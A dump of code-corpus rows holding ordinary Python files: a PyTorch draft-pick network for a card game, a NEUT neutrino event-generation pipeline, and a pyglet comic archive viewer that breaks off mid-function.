max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
demae/dest/__init__.py | uiureo/demae | 6 | 12769651 | # flake8: noqa
from .s3_dest import S3Dest
| 0.921875 | 1 |
bots/draftsimtools/nnet_architecture.py | khakhalin/mtg | 14 | 12769652 | <reponame>khakhalin/mtg
# Torch imports
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data.dataset import Dataset
# Implements NN
class DraftNet(nn.Module):
    """Feed-forward draft-pick scoring network.

    The input x (one row per example) is the concatenation of a
    collection vector and a pack vector, each of length ss (the number
    of cards in the set); the output is one score per card, masked so
    that only cards present in the current pack can be non-zero.

    NOTE(review): __getitem__, __len__, create_new_x and create_new_y
    below read self.drafts_tensor / self.draft_size / self.pack_size /
    self.cards_in_set, none of which are set in __init__, and use the
    names `np` and `device`, which are not imported or defined in this
    file.  They look copied from a torch Dataset class -- confirm
    before relying on them from this class.

    param set_tensor: M x ss tensor describing the set (M features per card)
    param use_features: if True, append M set-derived features to the input
    """
    def __init__(self, set_tensor, use_features = False):
        super(DraftNet, self).__init__()
        # Specifies whether we train with features or not
        self.use_features = use_features
        # Load set tensor.
        self.set_tensor = set_tensor
        # Transposed copy (ss x M) used to project a collection onto the
        # feature space in forward().  NOTE(review): attribute name has a
        # typo ("tranpose"); kept as-is because forward() depends on it.
        self.set_tensor_tranpose = torch.transpose(set_tensor, 0, 1)
        # M = features per card, ss = number of cards in the set.
        self.M, self.ss = self.set_tensor.shape
        # NOTE(review): true division -- half_ss is a float and is unused.
        self.half_ss = self.ss / 2
        # Specify layer sizes.  NOTE(review): size5..size8 are never used;
        # only four linear layers are created below.
        size_in = self.ss
        if use_features:
            size_in = self.ss + self.M
        size1 = self.ss
        size2 = self.ss
        size3 = self.ss
        size4 = self.ss
        size5 = self.ss
        size6 = self.ss
        size7 = self.ss
        size8 = self.ss
        # Negative slope shared by all LeakyReLU activations.
        self.ns = 0.01
        # Input batch-norm; only applied in forward() when use_features.
        self.bn = nn.BatchNorm1d(self.ss)
        if use_features:
            self.bn = nn.BatchNorm1d(self.ss + self.M)
        # Three (linear -> batch-norm -> LeakyReLU -> dropout) stages
        # followed by a final linear layer.
        self.linear1 = torch.nn.Linear(size_in, size1)
        self.bn1 = nn.BatchNorm1d(size1)
        self.relu1 = torch.nn.LeakyReLU(negative_slope = self.ns)
        self.dropout1 = nn.Dropout(0.5)
        self.linear2 = torch.nn.Linear(size1, size2)
        self.bn2 = nn.BatchNorm1d(size2)
        self.relu2 = torch.nn.LeakyReLU(negative_slope = self.ns)
        self.dropout2 = nn.Dropout(0.5)
        self.linear3 = torch.nn.Linear(size2, size3)
        self.bn3 = nn.BatchNorm1d(size3)
        self.relu3 = torch.nn.LeakyReLU(negative_slope = self.ns)
        self.dropout3 = nn.Dropout(0.5)
        self.linear4 = torch.nn.Linear(size3, size4)
        self.relu4 = torch.nn.LeakyReLU(negative_slope = self.ns)
    def forward(self, x):
        """Score every card for a (batch, 2*ss) input batch.

        NOTE(review): relu4 is created in __init__ but never applied
        here -- the output is the raw linear4 activation, masked by
        the pack vector.  Confirm whether that is intended.
        """
        # Split the input into collection (first ss) and pack (last ss).
        collection = x[:, :self.ss]
        pack = x[:, self.ss:]
        # Get features from set tensor if specified
        if self.use_features:
            features = torch.mm(collection, self.set_tensor_tranpose)
            collection_and_features = torch.cat((collection, features), 1)
            collection_and_features = self.bn(collection_and_features)
            collection = collection_and_features
        y = self.linear1(collection)
        y = self.bn1(y)
        y = self.relu1(y)
        y = self.dropout1(y)
        y = self.linear2(y)
        y = self.bn2(y)
        y = self.relu2(y)
        y = self.dropout2(y)
        y = self.linear3(y)
        y = self.bn3(y)
        y = self.relu3(y)
        y = self.dropout3(y)
        y = self.linear4(y)
        y = y * pack # Enforce cards in pack only.
        return y
    def __getitem__(self, index):
        """Return a training example (x, y).

        NOTE(review): Dataset-style accessor; depends on attributes not
        set in this class (see class docstring).
        """
        #Grab information on current draft.
        pick_num = index % self.draft_size #0-self.pack_size*3-1
        draft_num = int((index - pick_num)/self.draft_size)
        #Generate.
        x = self.create_new_x(pick_num, draft_num)
        y = self.create_new_y(pick_num, draft_num)
        return x, y
    def create_new_x(self, pick_num, draft_num):
        """Generate x, input, as a row vector.
        0:n : collection vector
            x[i]=n -> collection has n copies of card i
        n:2n : pack vector
            0 -> card not in pack
            1 -> card in pack
        Efficiency optimization possible. Iterative adds to numpy array.

        NOTE(review): uses `np`, which is not imported in this file.
        """
        #Initialize collection / cards in pack vector.
        x = np.zeros([self.cards_in_set * 2], dtype = "int16")
        #Fill in collection vector excluding current pick (first half).
        for n in self.drafts_tensor[draft_num, :pick_num, 0]:
            x[n] += 1
        #Fill in pack vector.
        cards_in_pack = self.pack_size - pick_num%self.pack_size #Cards in current pack.
        for n in self.drafts_tensor[draft_num, pick_num, :cards_in_pack]:
            x[n + self.cards_in_set] = 1
        #Convert to Torch tensor.
        x = torch.Tensor(x)
        return x
    def create_new_y(self, pick_num, draft_num, not_in_pack=0.5):
        """Generate y, a target pick row vector.
        Picked card is assigned a value of 1.
        Other cards are assigned a value of 0.

        NOTE(review): the `not_in_pack` parameter is unused, and
        `device` is not defined anywhere in this file.
        """
        #Initialize target vector.
        #y = np.array([0] * self.cards_in_set)
        y = np.zeros([self.cards_in_set], dtype = "int16")
        #Add picked card.
        y[self.drafts_tensor[draft_num, pick_num, 0]] = 1
        #y = torch.Tensor(y, dtype=torch.int64) # Needed as target.
        y = torch.tensor(y, dtype=torch.int64, device=device) # Needed as target.
        return y
    def __len__(self):
        # Total number of picks across all recorded drafts.
        return len(self.drafts_tensor) * self.draft_size
src/vectorgen/run_genev.py | davehadley/hk-vectorgen | 0 | 12769653 | <filename>src/vectorgen/run_genev.py
import ROOT
import shutil
import tempfile
ROOT.PyConfig.IgnoreCommandLineOptions = True
import subprocess
import os
import glob
import argparse
import itertools
import collections
import runtime
#Jobs:
# (1) Merge flux files.
# (2) Create geometry.
# (3) Run event_rate.
# (4) Run genev.
###############################################################################
def _abspath(path):
f = os.path.expandvars(os.path.expanduser(path))
return os.path.abspath(f)
###############################################################################
class IJob(object):
    """Base class for the pipeline job steps (flux linking/merging,
    geometry creation, event_rate, genev).

    Sub-classes override verify() and run().  With test=True commands
    are printed instead of executed (dry run).  NOTE: this module uses
    Python 2 print statements.
    """
    def __init__(self, rundir=None, test=False):
        self._test = test
        # Each job works inside a RunDir populated with NEUT run files.
        if rundir is None:
            rundir = RunDir()
        self._rundir = rundir
    def _tmp_chdir(self, workingdir, func, *args, **kwargs):
        """Run func(*args, **kwargs) with the CWD temporarily set to
        *workingdir* (no-op when workingdir is None)."""
        #keep original directory to change back to
        origdir = os.getcwd()
        #change directory
        if workingdir is not None:
            os.chdir(workingdir)
        #actually run function
        try:
            ret = func(*args, **kwargs)
        finally:
            #change back to the original directory
            if workingdir is not None:
                os.chdir(origdir)
        return ret
    def _check_call(self, cmd, workingdir=None):
        """Run the shell command *cmd* inside *workingdir* (defaults to
        the run directory); in test mode just print it."""
        if workingdir is None:
            workingdir = self._rundir.rundir()
        ret = None
        if self._test:
            print "[TEST]",cmd
        else:
            ret = self._tmp_chdir(workingdir, subprocess.check_call, cmd, shell=True)
        return ret
    def verify(self):
        """Check preconditions; overridden by sub-classes."""
        return
    def run(self):
        """Execute the job; overridden by sub-classes."""
        return
###############################################################################
BeamPlane = collections.namedtuple("BeamPlane", ["name", "baseline", "ndcode"])
###############################################################################
def plane_from_ndid(ndid, context):
    """Look up flux plane *ndid* in *context* and return it as a BeamPlane."""
    planes = context.beamcontext.flux_planes()
    return BeamPlane(
        name=planes.tostring(ndid),
        baseline=planes.baseline(ndid),
        ndcode=planes.flukaid(ndid),
    )
###############################################################################
class RunDir:
    """A working directory populated with the NEUT run-time files.

    Creates (or reuses) a directory, mirrors the symlinks found in
    $NEUT_ROOT/src/neutsmpl into it and copies the card file in as
    "neut.card", so the NEUT executables can run from it.
    """
    def __init__(self, path=None, card=None):
        # Default to a fresh temporary directory.
        if path is None:
            path = tempfile.mkdtemp(prefix="tmp_run_genev_")
        self._rundir = _abspath(path)
        self._card = self._find_card(card)
        self._run_make_links()
    def rundir(self):
        """Absolute path of the run directory."""
        return self._rundir
    def _find_card(self, card):
        """Resolve the card file path, falling back to the NEUT default.

        Raises Exception if the resolved file does not exist.
        """
        if card is None:
            #use default from NEUTGEOM directory
            card = "".join((os.environ["NEUT_ROOT"], os.sep, "src/neutgeom/neut.card"))
        card = _abspath(card)
        if not os.path.exists(card):
            raise Exception("Cannot find card file", card)
        return card
    def _run_make_links(self):
        """Create the run directory, re-create the neutsmpl symlinks in
        it and copy the card file as neut.card."""
        outdir = self.rundir()
        try:
            os.makedirs(outdir)
        except os.error:
            #ignore as this happens if directory already exists
            pass
        inputdir = "".join((os.environ["NEUT_ROOT"], os.sep, "src", os.sep, "neutsmpl"))
        # Only symlinks are mirrored; regular files are left alone.
        for fname in os.listdir(inputdir):
            src = "".join((inputdir, os.sep, fname))
            if os.path.islink(src):
                dst = "".join((self.rundir(), os.sep, fname))
                if not os.path.exists(dst):
                    os.symlink(src, dst)
        src = self._card
        dst = "".join((self.rundir(), os.sep, "neut.card"))
        shutil.copyfile(src, dst)
        return
###############################################################################
class MergeFluxJob(IJob):
    """Merge the individual flux files into one with ROOT's hadd.

    NOTE(review): apparently superseded by MakeFluxLinks -- see
    CompleteJob.run(), where this job is commented out.
    """
    def __init__(self, beam_input, rundir=None, test=False):
        super(MergeFluxJob, self).__init__(rundir, test)
        self._beam_input = beam_input
    def run(self):
        # Only merge if the merged output does not exist yet.
        if not os.path.exists(self._beam_input.filename()):
            self.verify()
            self._run_hadd()
        return
    def verify(self):
        self._beam_input.verify()
    def _run_hadd(self):
        # hadd <output> <input1> <input2> ...
        cmd = " ".join(("hadd",
                        self._beam_input.filename(),
                        " ".join(self._beam_input.filelist()
                                 )),
                       )
        self._check_call(cmd)
###############################################################################
class MakeFluxLinks(IJob):
    """Symlink the flux files into the run directory under the uniform
    names <filestem>.<i>.root that event_rate/genev expect with -s."""
    def __init__(self, beam_input, rundir=None, test=False, n=None):
        super(MakeFluxLinks, self).__init__(rundir, test)
        # n optionally limits how many files are linked (e.g. for tests).
        self._n = n
        self._beam_input = beam_input
    def run(self):
        if not os.path.exists(self._beam_input.filename()):
            self.verify()
            self._run_make_links()
        return
    def verify(self):
        self._beam_input.verify()
    def _run_make_links(self):
        # NOTE(review): outdir (rundir/linkdir) is created here but the
        # links below are written directly into the run directory --
        # confirm whether linkdir is still needed.
        outdir = "".join((self._rundir.rundir(), os.sep, self._beam_input.linkdir()))
        try:
            os.makedirs(outdir)
        except os.error:
            #ignore as this happens if directory already exists
            pass
        for i, fname in enumerate(self._beam_input.filelist()):
            if self._n is not None and i >= self._n:
                break
            src = fname
            # Link name: <rundir>/<stem>.<i>.root
            dst = "".join((self._rundir.rundir(), os.sep, self._beam_input.filestem(), ".", str(i), ".root"))
            if not os.path.exists(dst):
                os.symlink(src, dst)
        return
###############################################################################
class Orientation:
    """String constants naming the detector's symmetry axis.  Only Z
    (along the beam) is implemented by GenWCGeom."""
    Z = "Z"
    Y = "Y"
###############################################################################
class CylinderGeometry:
    """A water cylinder detector volume at a given flux plane.

    radius and z are in metres; the volume is a ROOT TGeoTube of radius
    *radius* and full length *z* along the beam (Z) axis.
    """
    def __init__(self, ndid, radius=4.0, z=8.0, orientation=Orientation.Z, context=None):
        if context is None:
            context = runtime.getcontext()
        self._context = context
        self.ndid = ndid
        self.radius = radius
        self.z = z
        self.orientation = orientation
        # Unique name used for output file naming.
        self.name = self._uniquestr()
        self._plane = plane_from_ndid(self.ndid, self._context)
    def verify(self):
        return
    def _uniquestr(self):
        # e.g. "nd2k_cylinder_r400_z800_Z" (dimensions in cm).
        return "_".join((self._context.beamcontext.flux_planes().tostring(self.ndid),
                         "cylinder",
                         self._float_to_string(self.radius, "r"),
                         self._float_to_string(self.z, "z"),
                         self.orientation,
                         ))
    def _float_to_string(self, f, prefix):
        # Metres -> integer centimetres with a prefix, e.g. 4.0 -> "r400".
        return prefix + str(int(round(f * 100.0)))
    def filename(self):
        return self.name + ".root"
    def volume_name(self):
        # Name of the sensitive volume inside the geometry file.
        return "wc_volume"
    def plane(self):
        return self._plane
    def build_detector_volume(self):
        """Return two identical TGeoTube shapes: (sensitive volume,
        enclosing top volume) -- see GenWCGeom."""
        #get dimensions
        m_to_mm = 1000.0
        radius_mm = self.radius * m_to_mm
        z_mm = self.z * m_to_mm / 2.0  # TGeoTube takes the half-length
        #build volume
        vol0 = ROOT.TGeoTube(0, radius_mm, z_mm);
        vol1 = ROOT.TGeoTube(0, radius_mm, z_mm);
        return (vol0, vol1)
###############################################################################
class CuboidGeometry:
    """A water cuboid detector volume at a given flux plane.

    NOTE(review): near-duplicate of CylinderGeometry -- a shared base
    class would remove the repetition.  `radius` is used as the box
    half-width: TGeoBBox takes half-lengths, so the box spans 2*radius
    metres in x and y and *z* metres along the beam axis.
    """
    def __init__(self, ndid, radius=4.0, z=8.0, orientation=Orientation.Z, context=None):
        if context is None:
            context = runtime.getcontext()
        self._context = context
        self.ndid = ndid
        self.radius = radius
        self.z = z
        self.orientation = orientation
        # Unique name used for output file naming.
        self.name = self._uniquestr()
        self._plane = plane_from_ndid(self.ndid, self._context)
    def verify(self):
        return
    def _uniquestr(self):
        # e.g. "nd2k_cuboid_x400_z800_Z" (dimensions in cm).
        return "_".join((self._context.beamcontext.flux_planes().tostring(self.ndid),
                         "cuboid",
                         self._float_to_string(self.radius, "x"),
                         self._float_to_string(self.z, "z"),
                         self.orientation,
                         ))
    def _float_to_string(self, f, prefix):
        # Metres -> integer centimetres with a prefix, e.g. 4.0 -> "x400".
        return prefix + str(int(round(f * 100.0)))
    def filename(self):
        return self.name + ".root"
    def volume_name(self):
        # Name of the sensitive volume inside the geometry file.
        return "wc_volume"
    def plane(self):
        return self._plane
    def build_detector_volume(self):
        """Return two identical TGeoBBox shapes: (sensitive volume,
        enclosing top volume) -- see GenWCGeom."""
        #get dimensions
        m_to_mm = 1000.0
        radius_mm = self.radius * m_to_mm
        z_mm = self.z * m_to_mm / 2.0  # half-length along z
        x_mm = radius_mm
        y_mm = radius_mm
        #build volume
        vol0 = ROOT.TGeoBBox(x_mm, y_mm, z_mm);
        vol1 = ROOT.TGeoBBox(x_mm, y_mm, z_mm);
        return (vol0, vol1)
###############################################################################
class CreateGeometryJob(IJob):
    """Write the detector geometry ROOT file if it does not exist yet."""
    def __init__(self, geometry, rundir=None, test=False):
        super(CreateGeometryJob, self).__init__(rundir, test)
        self._geometry = geometry
    def run(self):
        """Create the geometry file (if missing) and return its name."""
        if not os.path.exists(self._geometry.filename()):
            self.verify()
            self._run_geometry()
        return self._geometry.filename()
    def verify(self):
        self._geometry.verify()
        return
    def _run_geometry(self):
        # Delegate the actual ROOT geometry construction.
        g = self._geometry
        gen = GenWCGeom()
        gen(g)
        return
###############################################################################
class GenWCGeom:
    """Build and write a simple water-Cherenkov ROOT geometry file: a
    water detector volume inside a top volume of the same shape."""
    #according to the manual ROOT geometry distance units are in cm.
    #however looking at the existing nd280geometry.root, it appears to be in mm.
    def __call__(self, geometry):
        g = geometry
        orientation = g.orientation
        # Only the beam-axis (Z) orientation is supported.
        if not orientation == Orientation.Z:
            raise Exception("not implemented")
        outfilename = g.filename()
        volume_name = g.volume_name()
        #create geometry
        wc_geometry = ROOT.TGeoManager("ND280Geometry","ND280Geometry");
        # Water medium: H2O built from its two elements.
        oxygen = ROOT.TGeoElement("oxygen", "oxygen", 8, 16);
        hydrogen = ROOT.TGeoElement("hydrogen", "hydrogen", 1, 1);
        water = ROOT.TGeoMixture("water", 2, 1);
        water.AddElement(oxygen, 1);
        water.AddElement(hydrogen, 2);
        water_med = ROOT.TGeoMedium("water", 1, water);
        # vol0 becomes the sensitive water volume, vol1 the top volume.
        vol0, vol1 = g.build_detector_volume()
        t2k = ROOT.TGeoVolume("t2k",vol1);
        wc_volume = ROOT.TGeoVolume(volume_name, vol0, water_med);
        t2k.AddNode(wc_volume, 1);
        wc_geometry.AddVolume(t2k);
        wc_geometry.SetTopVolume(t2k);
        #write geometry to file
        outfile = ROOT.TFile(outfilename, "RECREATE");
        wc_geometry.Write()
        # wc_geometry.Export(outfilename.replace(".root", ".gdml"))
        outfile.Close()
        return
###############################################################################
class EventRateJob(IJob):
    """Run NEUT's event_rate over the linked flux files, producing the
    interaction-rate file that genev takes as input (-i)."""
    def __init__(self, beam_input, geometry, rundir=None, test=False):
        super(EventRateJob, self).__init__(rundir, test)
        self._beam_input = beam_input
        self._geometry = geometry
    def filename(self):
        """Output file name, unique per beam/geometry combination."""
        beamname = self._beam_input.name
        geomname = self._geometry.name
        outfilename = "_".join(("eventrate",
                                beamname,
                                geomname,
                                )) + ".root"
        return outfilename
    def run(self):
        # Skip if the output already exists (cheap resume).
        outfilename = self.filename()
        if not os.path.exists(outfilename):
            self._create_event_rate()
        return
    def _create_event_rate(self):
        """Assemble and run the event_rate command line."""
        outfilename = _abspath(self.filename())
        beamfile = _abspath(self._beam_input.filename())
        filestem = self._beam_input.filestem()
        filestem = "".join((self._rundir.rundir(), os.sep, filestem))
        #N = len(self._beam_input.filename()) - 1
        # Highest index of the <stem>.<i>.root link series made by
        # MakeFluxLinks.
        N = len(glob.glob(filestem + "*.root")) - 1
        if N <= 0:
            raise Exception("No flux files matching", filestem)
        geomfile = _abspath(self._geometry.filename())
        volumename = self._geometry.volume_name()
        plane = self._geometry.plane()
        planenum = plane.ndcode
        neutgeompath = os.environ["NEUTGEOM"]
        # -s stem first last : flux file series; -g geometry file;
        # -v +volume : sensitive volume; -o output; -d flux plane code.
        cmd = " ".join((
            os.sep.join((neutgeompath, "event_rate")),
            #"-f", beamfile,
            "-s", filestem, "0", str(N),
            "-g",
            geomfile,
            "-v",
            "+" + volumename,
            "-o",
            outfilename,
            "-d",
            str(planenum),
        ))
        #setupneutcmd = "source /home/software/neut/setupNeut.sh" # TODO : move this to constants somewhere.
        #cmd = " && ".join((setupneutcmd, cmd))
        self._check_call(cmd)
        return
    def verify(self):
        pass
###############################################################################
class GenEvConfig:
    """Event-generation settings for a genev run.

    param num_events: number of events to generate (genev -n).
    param nu_pdg: PDG code of the neutrino flavour to generate, or
        None/0 for all flavours (genev -p).

    Raises Exception for PDG codes other than 0/+-12/+-14.
    """
    def __init__(self, num_events, nu_pdg):
        self.num_events = num_events
        # 0 means "all neutrino flavours"; treat None the same way.
        if nu_pdg is None:
            nu_pdg = 0
        self.nu_pdg = nu_pdg
        # Map of supported PDG codes to the label used in output names.
        self._nu_pdg_names = {0 : "allnuflav",
                              12 : "nue",
                              14 : "numu",
                              -12 : "antinue",
                              -14 : "antinumu",
                              }
        # nu_pdg can no longer be None here (coerced to 0 above), so
        # only the membership check is needed.
        if self.nu_pdg not in self._nu_pdg_names:
            raise Exception("unknown neutrino PDG", self.nu_pdg)
    @property
    def name(self):
        """A unique label for this configuration, e.g. "10000_numu"."""
        nupdgname = self._nu_pdg_names[self.nu_pdg]
        return "_".join((str(self.num_events),
                         nupdgname,
                         ))
###############################################################################
class GenEvJob(IJob):
    """Run NEUT's genev to generate neutrino interaction events, using
    the event-rate file produced by EventRateJob."""
    def __init__(self, gen_config, beam_input, geometry, eventratejob, rundir=None, test=False):
        super(GenEvJob, self).__init__(rundir, test)
        self._gen_config = gen_config
        self._beam_input = beam_input
        self._geometry = geometry
        self._eventrate = eventratejob
    def filename(self):
        """Output file name, unique per beam/geometry/config combination."""
        beamname = self._beam_input.name
        geomname = self._geometry.name
        configname = self._gen_config.name
        outfilename = "_".join(("genev",
                                beamname,
                                geomname,
                                configname,
                                )) + ".root"
        return outfilename
    def run(self):
        # Skip if the output already exists (cheap resume).
        outfilename = self.filename()
        if not os.path.exists(outfilename):
            self._create_genev()
        return
    # Example invocation:
    #genev -j flux_files.root -g nd280geometry.root -v +Basket -o test.genev.output.2.root -n 10 -f rootracker -i setup_output.root -d 5 2>&1
    def _create_genev(self):
        """Assemble and run the genev command line."""
        outfilename = _abspath(self.filename())
        beamfile = _abspath(self._beam_input.filename())
        filestem = self._beam_input.filestem()
        filestem = "".join((self._rundir.rundir(), os.sep, filestem))
        #N = len(self._beam_input.filename()) - 1
        # Highest index of the <stem>.<i>.root link series made by
        # MakeFluxLinks.
        N = len(glob.glob(filestem + "*.root")) - 1
        if N <= 0:
            raise Exception("No flux files matching", filestem)
        geomfile = _abspath(self._geometry.filename())
        eventratefile = _abspath(self._eventrate.filename())
        volumename = self._geometry.volume_name()
        plane = self._geometry.plane()
        planenum = plane.ndcode
        neutgeompath = os.environ["NEUTGEOM"]
        numevents = self._gen_config.num_events
        nupdg = self._gen_config.nu_pdg
        # Flags as for event_rate, plus: -n number of events,
        # -f output format, -i precomputed event-rate file,
        # -w 1 rewind flux, -p neutrino PDG selection.
        cmd = " ".join((
            os.sep.join((neutgeompath, "genev")),
            #"-j", beamfile,
            "-s", filestem, "0", str(N),
            "-g",
            geomfile,
            "-v",
            "+" + volumename,
            "-o",
            outfilename,
            "-d",
            str(planenum),
            "-n",
            str(numevents),
            "-f rootracker",
            #"-f neut",
            "-i",
            eventratefile,
            "-w 1 ", #rewind the flux file
            "-p",
            str(nupdg),
        ))
        #setupneutcmd = "source /home/software/neut/setupNeut.sh" # TODO : move this to constants somewhere.
        #cmd = " && ".join((setupneutcmd, cmd))
        self._check_call(cmd)
        return
###############################################################################
class CompleteJob(IJob):
    """Run the whole chain for one configuration: link the flux files,
    create the geometry, compute the event rate, then generate events."""
    def __init__(self, beam_input, geometry, gen_config, rundir=None, test=False):
        super(CompleteJob, self).__init__(rundir, test)
        self._beam_input = beam_input
        self._geometry = geometry
        self._gen_config = gen_config
    def run(self):
        beam_input = self._beam_input
        geometry = self._geometry
        gen_config = self._gen_config
        #job_flux = MergeFluxJob(beam_input, test=self._test)
        rundir = self._rundir
        # All sub-jobs share this job's run directory and test flag.
        job_flux = MakeFluxLinks(beam_input, test=self._test, rundir=rundir)
        job_creategeometry = CreateGeometryJob(geometry, test=self._test, rundir=rundir)
        job_evrate = EventRateJob(beam_input, geometry, test=self._test, rundir=rundir)
        job_genev = GenEvJob(gen_config, beam_input, geometry, job_evrate, test=self._test, rundir=rundir)
        jobs = [job_flux,
                job_creategeometry,
                job_evrate,
                job_genev,
                ]
        # Verify then run each stage in dependency order.
        for j in jobs:
            j.verify()
            j.run()
        return
###############################################################################
def str_from_polarity(polarity):
    """Return the job-name label for a beam polarity: "antinu" for
    anti-neutrino mode (polarity < 0), otherwise "nu"."""
    return "antinu" if polarity < 0 else "nu"
###############################################################################
def getjobname(opt):
    """Name for this job's flux input, derived from the beam polarity."""
    return str_from_polarity(opt.polarity)
###############################################################################
def run(opt):
    """Top-level driver: build the runtime context, flux-file input,
    detector geometry and generator configuration from the parsed
    options, then run the complete job chain.

    NOTE(review): BeamInput (used below) is not defined or imported in
    this module -- presumably it belongs to `runtime` or a missing
    import; confirm before running.
    """
    test = opt.test
    card = opt.card
    ndid = opt.flux
    radius = opt.radius
    polarity = opt.polarity
    z = opt.z
    nevents = opt.n
    nu_pdg = opt.pdg
    jobname = getjobname(opt)
    #beamcontext = runtime.getcontext().beamcontext
    #nu_flux_files = glob.glob(_abspath("~/t2k/data/irods/QMULZone2/home/hyperk/fluxes/fluka_flux/numode/*.root"))
    #antinu_flux_files = glob.glob(_abspath("~/t2k/data/irods/QMULZone2/home/hyperk/fluxes/fluka_flux/anumode/*.root"))
    # Hard-coded flux-file locations for each beam mode.
    nu_flux_files = glob.glob(_abspath("~/t2k/data/hk/ryan_flux/numode/*.root"))
    antinu_flux_files = glob.glob(_abspath("~/t2k/data/hk/ryan_flux/antinumode/*.root"))
    # A single flux plane, "nd2k", at a 2.04 baseline (units per runtime.FluxPlane).
    fluxplanes = runtime.FluxPlaneDefinitions()
    fluxplanes.add(runtime.FluxPlane(name="nd2k", baseline=2.04, flukaid=1))
    beamcontext = runtime.BeamContext(jnubeamfiles=runtime.JnuBeamFiles(nu_flux_files, antinu_flux_files), fluxplanes=fluxplanes)
    context = runtime.Context(beamcontext=beamcontext)
    jnubeamfiles = beamcontext.jnubeamfiles()
    jnubeamfiles.verify()
    # Choose the flux-file set matching the requested beam polarity.
    if polarity == 1:
        filelist = jnubeamfiles.nu_flux_files
    elif polarity == -1:
        filelist = jnubeamfiles.antinu_flux_files
    else:
        raise Exception()
    #print "DEBUG speed up process for debugging"
    #filelist = filelist[0:10]
    rundir = RunDir(card=card)
    beam_input = BeamInput(jobname, filelist)
    #geometry = Geometry(ndid=self._context.DetectorId.ND280, radius=2.0, z=4.0, orientation=Orientation.Z)
    if opt.geometry.lower() == "cylinder":
        geometry = CylinderGeometry(ndid=ndid, radius=radius, z=z, orientation=Orientation.Z, context=context)
    else:
        geometry = CuboidGeometry(ndid=ndid, radius=radius, z=z, orientation=Orientation.Z, context=context)
    gen_config = GenEvConfig(num_events=nevents, nu_pdg=nu_pdg)
    job = CompleteJob(beam_input, geometry, gen_config, test=test, rundir=rundir)
    job.run()
    return
###############################################################################
def parsecml():
    """Parse the command line; see the individual help strings."""
    parser = argparse.ArgumentParser()
    parser.add_argument("polarity", type=int, choices=[-1, 1], help="+1 to run neutrino, -1 to run anti-neutrino.", default=1)
    parser.add_argument("radius", type=float, help="Set radius of cylinder in m.")
    parser.add_argument("z", type=float, help="Set z of cylinder in m.")
    parser.add_argument("flux", type=str, help="choose flux plane.")
    parser.add_argument("--geometry", type=str, choices=["cylinder", "cuboid"], help="choose geometry type", default="cuboid")
    parser.add_argument("-c", "--card", type=str, default=None)
    parser.add_argument("-n", "--nevents", dest="n", type=int, default=10000)
    parser.add_argument("-p", "--pdg", dest="pdg", type=int, choices=[-14, -12, 12, 14], default=None)
    # Bug fix: argparse type=bool is broken for flags -- bool("False") is
    # True, so any non-empty argument enabled test mode.  A store_true
    # flag ("-t" with no argument) gives the intended behaviour.
    parser.add_argument("-t", "--test", dest="test", action="store_true", default=False)
    return parser.parse_args()
def main():
    """Script entry point: parse the command line and run the job."""
    opt = parsecml()
    run(opt)
    return
###############################################################################
# Allow use both as a script and as an importable module.
if __name__ == "__main__":
    main()
###############################################################################
| 2.203125 | 2 |
comics.py | wormsparty/python-comics-reader | 1 | 12769654 | <filename>comics.py
#!/usr/bin/env python3
#
# Copyright (C) 2012 <NAME> <wormsparty [at] gmail [dot] com>
#
# This program is a free software: you can redistribute it
# and/or modify it under the terms of the 'New BSD License'.
# See COPYING for more information.
#
import archive
import pyglet
import sys
import io
# We can specify any number of archives,
# read one after another
# Require at least one archive argument.
if len(sys.argv) == 1:
    print("Usage: " + sys.argv[0] + " (archive)+")
    sys.exit(1)
# We keep a list of sane files: open each candidate once up front and
# drop anything that is not a readable archive.
archives = []
for i in sys.argv[1:]:
    try:
        archive.Archive(i)
        archives.append(i)
    except archive.core.Error:
        print(i + " doesn't seem to be an archive.")
# The current archive instance and archive number.
a = None
archive_index = 0
# Call to read the archive associated with 'idx'.
def load_archive(idx):
    """Open archive number *idx* and position its iterator.

    When moving backwards (idx < archive_index) the archive is first
    scanned to count its entries, then re-opened and advanced so the
    iterator sits on its last image.
    """
    global a
    global position
    global archive_index
    # By going back the program doesn't exit if it reached the end.
    if idx < 0:
        idx = 0
    # Don't read further than you can!
    if idx >= len(archives):
        print("Done :)")
        sys.exit(0)
    try:
        a = iter(archive.Archive(archives[idx]))
    except archive.core.Error:
        # Shouldn't happen since we already checked the existence of
        # the file. If this happens, at least don't crash!
        # NOTE(review): execution falls through after this recursive
        # call and continues below with the stale idx -- a `return`
        # here looks intended; confirm.
        load_archive(idx + 1)
    if idx < archive_index:
        # Here it's a bit hard, since we need to
        # know how many entries there are. pyarchive
        # doesn't look like it provides a 'len' field, so...
        try:
            while True:
                a.__next__()
                position += 1
        except StopIteration:
            # Back off past the end marker and the last entry so the
            # following re-read lands on the final image.
            position -= 2
        # Go one step back...
        try:
            a = iter(archive.Archive(archives[idx]))
        except archive.core.Error:
            # Shouldn't happen.
            # Go back to the one that didn't fail.
            load_archive(idx + 1)
        # Re-advance the fresh iterator to the saved position.
        for x in range(0, position):
            a.__next__()
    else:
        position = 0
    archive_index = idx
# Load the first archive.
load_archive(0)
# Initialize graphics: a fullscreen window; `img` holds the sprite
# currently on screen (None until the first image is loaded).
window = pyglet.window.Window(fullscreen=True)
img = None
def load_image(buff, filename):
    """Decode *buff* (raw image bytes) into the on-screen sprite,
    rotated 90 degrees and scaled to fill the window height."""
    global img
    # Since the images are taller than large, we need to rotate them
    # by 90 degrees to be visible on monitors, which are wider than tall.
    f = io.BytesIO(buff)
    img = pyglet.sprite.Sprite(pyglet.image.load(filename, file=f))
    # Scale so the rotated image's long side fits the window height.
    img.scale = float(window.height) / float(img.image.width)
    img.set_position(img.image.height * img.scale, 0)
    img.rotation = -90.0
def load_next_image():
    """Advance to the next non-empty entry, rolling over to the next
    archive when the current one is exhausted."""
    global a
    global position
    try:
        element = a.__next__()
        position += 1
    except StopIteration:
        # Current archive exhausted: move to the next one and retry.
        load_archive(archive_index + 1)
        load_next_image()
        return
    buff = element.read()
    if len(buff) > 0:
        load_image(buff, element.filename)
    else:
        # Skip zero-length entries (e.g. directories).
        load_next_image()
def load_prev_image():
    """Step back to the previous non-empty entry.  The archive iterator
    is forward-only, so the archive is re-opened and read forward up to
    the new position; at the first entry, fall back to the previous
    archive instead."""
    global a
    global position
    # NOTE(review): `idx` is never assigned or read in this function --
    # this global declaration looks like dead code.
    global idx
